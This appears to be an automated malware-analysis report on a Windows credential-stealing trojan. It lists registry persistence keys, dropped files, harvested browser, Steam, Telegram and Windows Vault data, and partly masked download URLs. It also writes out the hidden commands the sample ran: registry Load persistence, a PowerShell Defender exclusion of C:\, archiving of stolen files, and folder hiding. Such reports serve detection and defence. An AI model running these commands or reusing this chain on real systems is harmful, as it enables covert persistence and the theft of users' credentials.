Technical Information
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = '%APPDATA%\WinAgent\WinAgent(32).exe.lnk'
- [<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\] 'WinAgent(32)' = '%PROGRAMDATA%\WinAgent(32).exe'
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = '%APPDATA%\WinDefender(32bit)\WinDefender(32bit).exe.lnk'
- <SYSTEM32>\tasks\s-1-7-14-1367508075-1383877453-1214317971-9143\{6ieac3xi-iq8m-85nc-bcc7-9b5klcc2vkgd}
- [<HKLM>\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'
- [<HKLM>\SYSTEM\CurrentControlSet\Services\TermService\Parameters] 'ServiceDll' = '%ProgramFiles%\Microsoft DN1\sqlmap.dll'
- %WINDIR%\syswow64\cmd.exe
- uen.culae.exe
- <SYSTEM32>\svchost.exe
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %HOMEPATH%\desktop\508softwareandos.doc
- %HOMEPATH%\desktop\applicantform_en.doc
- %APPDATA%\thunderbird\profiles.ini
- %APPDATA%\mozilla\firefox\profiles.ini
- %APPDATA%\winagent\winagent(32).exe
- %TEMP%\autfc7e.tmp
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.sqlite3.module.dll.9
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.sqlite3.module.dll
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\screen.jpg
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\desktop txt files\508softwareandos.doc
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\desktop txt files\applicantform_en.doc
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\desktop txt files\glidescope_review_rev_010.docx
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\steam\config\config.vdf
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\steam\инструкция по установке.txt
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\steam\config\dialogconfig.vdf
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\telegram\d877f783d5d3ef8c\map0
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\telegram\инструкция по установке.txt
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\telegram\d877f783d5d3ef8c1
- %APPDATA%\mabkjbc.tmp
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\information.txt
- %TEMP%\aut3052.tmp
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.module.exe.9
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\index.dat
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.module.exe
- %APPDATA%\microsoft\windows\cookies\low\index.dat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\4gws6vc3\desktop.ini
- %APPDATA%\winagent\winagent(32).exe.lnk
- %APPDATA%\tmp.exe
- %TEMP%\.exe
- %PROGRAMDATA%\winagent(32).exe
- %APPDATA%\uen.culae.exe
- %ProgramFiles%\microsoft dn1\sqlmap.dll
- %ProgramFiles%\microsoft dn1\rdpwrap.ini
- <SYSTEM32>\microsoft\protect\s-1-5-20\11e24d86-f9d8-4278-a75c-f57100b5138c
- <SYSTEM32>\microsoft\protect\s-1-5-20\preferred
- %PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- %APPDATA%\windefender(32bit)\windefender(32bit).exe.lnk
- %APPDATA%\windefender(32bit)\windefender(32bit).exe:zone.identifier
- %TEMP%\svhost.exe
- %APPDATA%\x86_microsoft-windows-s..interface.resources\enu_87fe97a033a147892535
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\cr83l0gb\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\09p4b19x\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\hmuzijbc\desktop.ini
- %APPDATA%\x86_microsoft-windows-s..interface.resources\[netherlands] 95.211.190.199.7z
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\cr83l0gb\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\09p4b19x\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\4gws6vc3\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\hmuzijbc\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
- %TEMP%\autfc7e.tmp
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\telegram\d877f783d5d3ef8c1
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\steam\config\dialogconfig.vdf
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\steam\config\config.vdf
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\steam\инструкция по установке.txt
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\desktop txt files\glidescope_review_rev_010.docx
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\desktop txt files\applicantform_en.doc
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\desktop txt files\508softwareandos.doc
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\screen.jpg
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\information.txt
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.module.exe
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.module.exe.9
- %TEMP%\aut3052.tmp
- %APPDATA%\mabkjbc.tmp
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.sqlite3.module.dll
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.sqlite3.module.dll.9
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\telegram\инструкция по установке.txt
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\telegram\d877f783d5d3ef8c\map0
- from %APPDATA%\tmp.exe to %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.exe
- http://14#.#85.195.20/upnp.exe
- http://a3####53.ngrok.io/BuilMasaD.exe
- DNS ASK a3####53.ngrok.io
- '%APPDATA%\tmp.exe'
- '%PROGRAMDATA%\winagent(32).exe'
- '%APPDATA%\uen.culae.exe'
- '%APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.exe'
- '%APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.module.exe' a -y -mx9 -ssw "%APPDATA%\x86_microsoft-windows-s..interface.resources\[Netherlands] 95.211.190.199.7z" "%APPDATA%\x86_microsoft-windows-s..interface.resources\1\*"
- '%WINDIR%\syswow64\cmd.exe' /c copy "C:/kruliz/<File name>.exe" "%appdata%\WinAgent\WinAgent(32).exe" /Y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%appdata%\WinAgent\WinAgent(32).exe.lnk" /f' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo [zoneTransfer]ZoneID = 2 > %appdata%\WinAgent\WinAgent(32).exe:Zone.Identifier' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ren "%appdata%\WinAgent\WinAgent(32).exe.jpg" WinAgent(32).exe' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c copy "C:/Users/user/AppData/Roaming/uEn.CulAE.exe" "%appdata%\WinDefender(32bit)\WinDefender(32bit).exe" /Y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%appdata%\WinDefender(32bit)\WinDefender(32bit).exe.lnk" /f' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo [zoneTransfer]ZoneID = 2 > %appdata%\WinDefender(32bit)\WinDefender(32bit).exe:Zone.Identifier' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ren "%appdata%\WinDefender(32bit)\WinDefender(32bit).exe.jpg" WinDefender(32bit).exe' (with hidden window)
- '%APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.module.exe' a -y -mx9 -ssw "%APPDATA%\x86_microsoft-windows-s..interface.resources\[Netherlands] 95.211.190.199.7z" "%APPDATA%\x86_microsoft-windows-s..interface.resources\1\*"' (with hidden window)
- '%WINDIR%\syswow64\attrib.exe' +s +h "%APPDATA%\x86_microsoft-windows-s..interface.resources"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c copy "C:/kruliz/<File name>.exe" "%appdata%\WinAgent\WinAgent(32).exe" /Y
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%appdata%\WinAgent\WinAgent(32).exe.lnk" /f
- '%WINDIR%\syswow64\reg.exe' add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%APPDATA%\WinAgent\WinAgent(32).exe.lnk" /f
- '%WINDIR%\syswow64\cmd.exe' /c echo [zoneTransfer]ZoneID = 2 > %appdata%\WinAgent\WinAgent(32).exe:Zone.Identifier
- '%WINDIR%\syswow64\cmd.exe' /c ren "%appdata%\WinAgent\WinAgent(32).exe.jpg" WinAgent(32).exe
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\syswow64\cmd.exe' /c copy "C:/Users/user/AppData/Roaming/uEn.CulAE.exe" "%appdata%\WinDefender(32bit)\WinDefender(32bit).exe" /Y
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%appdata%\WinDefender(32bit)\WinDefender(32bit).exe.lnk" /f
- '%WINDIR%\syswow64\reg.exe' add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%APPDATA%\WinDefender(32bit)\WinDefender(32bit).exe.lnk" /f
- '%WINDIR%\syswow64\cmd.exe' /c echo [zoneTransfer]ZoneID = 2 > %appdata%\WinDefender(32bit)\WinDefender(32bit).exe:Zone.Identifier
- '%WINDIR%\syswow64\cmd.exe' /c ren "%appdata%\WinDefender(32bit)\WinDefender(32bit).exe.jpg" WinDefender(32bit).exe
- '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\syswow64\WININET.dll",DispatchAPICall 1
- '%WINDIR%\syswow64\attrib.exe' +s +h "%APPDATA%\x86_microsoft-windows-s..interface.resources"